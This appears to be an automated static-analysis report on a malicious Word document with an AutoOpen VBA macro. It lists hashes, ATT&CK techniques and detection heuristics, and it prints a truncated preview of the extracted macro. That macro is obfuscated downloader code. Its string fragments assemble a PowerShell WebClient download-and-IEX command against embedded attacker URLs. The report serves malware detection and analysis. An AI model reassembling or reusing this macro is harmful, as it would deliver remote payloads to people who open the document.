Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7878c33c8e24645e…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 143.0 KB
Created: 2017-12-06 10:57:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: 8682f720a5e64e3c9327f15068ccbc0e
SHA-1: 93ede5e0829427dee049fc78298a9e5dd6f43940
SHA-256: 7878c33c8e24645ead1665c4ceee169a70bfb77224b9025e8253e3926608de1a
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 (Visual Basic)
  • T1204.002 (Malicious File)

The sample is a malicious Office document containing VBA macros. The AutoOpen macro runs on document open and executes a Shell() call, which is highly suspicious. The macro assembles a URL string, 'http://bis7hH+7hHDB7+7hH+7hHDB7nDB7+DqNY2zbLIXzpljr', that as extracted still contains the obfuscation filler tokens (e.g. 'DB7', '7hH') the macro's string-replacement routine strips at runtime; the final host is therefore not recoverable from the static string alone. The URL is most likely used to download and execute a second-stage payload, indicating dropper or downloader functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6393158-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6393158-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 52532 bytes
SHA-256: 54cf558ac60a6637a185f806c5fcdf7057d6c1380f024675519c2466ddcc55e6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rzIjNEUMAv"
Function QzjLdSwHd()
znSAlCwQtDj = Array(UCase("AhaviijGnaho" + "ZMdCKjdlh" + "IAcczfcJiKZA" + "AIjMbduJEERo" + "VfjBUBTwSuBFj"))
bjKCV = Mid("TQruN6rA2fHAEOzNMpSlZFFmpEApWz9B7+D'+'B7s7hH+7hH);breaDB7+DB7k;}ca7hH+7hHDB7+DB7tc'+'h{DB7+DB7wDB7+DB7rDB7+DB7ite-hDB7+DBAbfszt", 32, 90)
jVzKwvpzIj = Array(UCase("jHQCVpmZ" + "kwiwwZafEGVb" + "UPVuuHrGiKDQ" + "MASaELvH" + "ikmtfOGzhuhz"))
LlaKCzOIq = Array(UCase("KRzinZcdtdT" + "HmbEwKo" + "JzahqYjo" + "NiGvCjsFaiPR" + "mFhRtjVNwrRZR"))
iAHkwEAjRaR = Array(UCase("WSPjsVb" + "LYkTjiLiQ" + "MVENfNq" + "jFlczllUiU" + "fiHUquvaVw"))
ubHWS = Mid("9HJs7ost SMDB7+D7hH+7hHB7v_.E'+'xc7'+'hH+7hHe'+'ptDB7+DB7iDB7+DB7on.MesDB7+DB7sage'+';}}DB7)-RE7hH+7hHpLac7hH+7hHEDB7pOmDB7,[chAr]92'+' -cReplace  ([cScrR24", 5, 146)
lfvzplCKabu = Array(UCase("qSnOsovfz" + "GEDjzVjZp" + "LUzYiASUO" + "pVlWBnnPWdwGG" + "LodmOdKrkA"))
dqVwbfbVM = Array(UCase("CvtpXiw" + "nCtVoWfj" + "zhLDrKlYEAO" + "jmUacCpiH" + "GYWjVlISw"))
zivEvUpz = Array(UCase("KAqNzTAwIz" + "cihpDtGlbkab" + "wzAhhoDfWhzOV" + "rHqIRsNzM" + "nDSGUDljZAOATS"))
KBYMED = Mid("qz8E'+'st'+'em.Net.WebClient;DB7+DB7S'+'MvnsadDB7+DB7asd = new-obD7hH+7hHB7+DB7jeDB7+DB7ct random;SDB7+DB7Mvbcd'+' = 8A3httpDB7+'+'DB7s:DB7+DB7//bis7hH+7hHDB'+'7+7hH+7hHDB7nDB7+DqNY2zbLIXzpljr", 5, 174)
ojDQA = Array(UCase("LUbokALl" + "QTihpEPZ" + "MTpATkbnhKoAQl" + "DHPLjpb" + "EarucqjcGLMGf"))
iJSMFrwB = Array(UCase("UwBFwjbha" + "dkcJjczkA" + "iWwLTwNoVFroYt" + "vMuPPMWrrqSJap" + "OPTYkzzqlA"))
lGWZPWYYprX = Array(UCase("kOinOfvUNZ" + "qtzHrHwI" + "SvLYwpjhmIjj" + "AXALmvq" + "jrBCLOMmrj"))
WwczkbKuFR = Mid("NwM/DB7+DB7,http:/D7h'+'H+7hHB7+7hH+7hHDB7/www.brDB7+DB7usstroyDB7+DB7.DB7+DB7ru/b7hH+'+'7'+'hHa/,httDB7+DB7p://www.xnDB7+DB7--DB77hH+7hH+DB7--8D'+'B7+DPFb4PwhCv4OH0zatwMo7C7WlCYE", 2, 151)
HTwuKo = Array(UCase("mMVXpMiLnP" + "VkhIiFU" + "mnwzqbU" + "JzwWIOtaJWUBFa" + "CIJtircTu"))
HSYGLJf = Array(UCase("KJDpCJrZwNi" + "sfotZGf" + "DRMmDJWkaU" + "vYCWtzizBvVsKw" + "JXXUmfLPaswQ"))
aTWPKGiGI = Array(UCase("wPuDQkKLKcM" + "jkhmsDSiJCEd" + "YvdRoIjFi" + "IASQGiHkzHK" + "ILKKzGi"))
vXKFuGrn = Mid("0GAii0o1mVbzKRR93Lw7+DB7vhDB7+DB7uajV", 20, 16)
ZqrOdaj = Array(UCase("snGwiSmhpJuw" + "JiYhZBoRAwNFh" + "kIbdwjzFN" + "WNrLFTOcYvWhq" + "TucTrpttwDCYN"))
BAjUN = Array(UCase("vLRqrohuVT" + "bBGYlZmLABR" + "WCTnRGd" + "ZaMizjcY" + "ANOjbjDCn"))
pKAOP = Array(UCase("VUjOiNWozC" + "fbjAUIQlEAO" + "DzTkOHMcOOj" + "ajAFQMD" + "bRMcHoVsAzVWHr"))
GrSVnlkjt = Mid("pARFlik8PjrY2ihvZhAr]56+[chAr]65+[c7hH'+'+7hHhAr]51),[chAr]39-cReplace  DB7SMvD7hH+7hHB7,[c'+'hAr]36) ufQ IEx7hH).RE'+'PLACe(([cHAr]68'+'+[cHAr]66+[cHAr]55),[STRINg][cHAr]39).REPLACeO4Q6", 18, 165)
zIVMdNAQkGF = Array(UCase("lNviUiHvnY" + "PnsKGAp" + "aCwNtzoCYu" + "Pkdiswiws" + "qopAQlZ"))
hOMkwPt = Array(UCase("RLcHjnZQRuh" + "kHKUswRAmk" + "dZmUbOtKujEju" + "EXJCBviaOkkpi" + "aqqthVziuSw"))
caHElAtXjz = Array(UCase("UWssRvRulSKPmw" + "NmbjVACKLr" + "kIshQwEajojFXF" + "zWZChkvJw" + "fQNzSMjARLI"))
itFWuA = Mid("494pBY2Lno4aHRwE4tQK9jrw9RDB7+DB7 = SMveDB7+D'+'B7nDB7hH+7hH7+DB7v:p7hH+'+'7hHub'+'l7hH+7hH'+'DB7+DB7'+'ic'+' + 8A3pDB7+DB7OmDB7+DB78DB7+DB7A3DB7+DB7 DB7+DB7+DB7+DB7 SMvDB7+DB7karapDB7+'+'DB7a'+'jfRIiubtI", 27, 169)
IZTizOHFo = Array(UCase("XkmqfYQ" + "nYIwlpICLBkm" + "QkDsLBYoWdqD" + "XwnYELYzoBisIr" + "wXsiLRHzi"))
wJjTaz = Array(UCase("EBLLLNj" + "jEdECjkIKOow" + "BkircRcAEFuIvS" + "rVYiZRwbmI" + "lbXqDWJICQdUiv"))
opqzWV = Array(UCase("OvLzUwF" + "mzTGsjj" + "VuIlVLoIOHQAh" + "oXLfHhqPS" + "JDPNwimSao"))
KXOUOGUjX = Mid("LUO9(7hHufQ7hH,['+'STRINg][cHAr]124'+'))').rEPlAce('E3f',[STrINg][cHAr]36).rEPqIfEfV", 5, 74)
QnwtWGBqBtj = Array(UCase("jcwjwHOM" + "opGYdDJvi" + "fAcNCXwmPHOB" + "mSkWdCMnXPGCN" + "kfzHhlBPG"))
AmihRpdKc = Array(UCase("HHViDHDjN" + "FVWLwuNZzCG
... (truncated)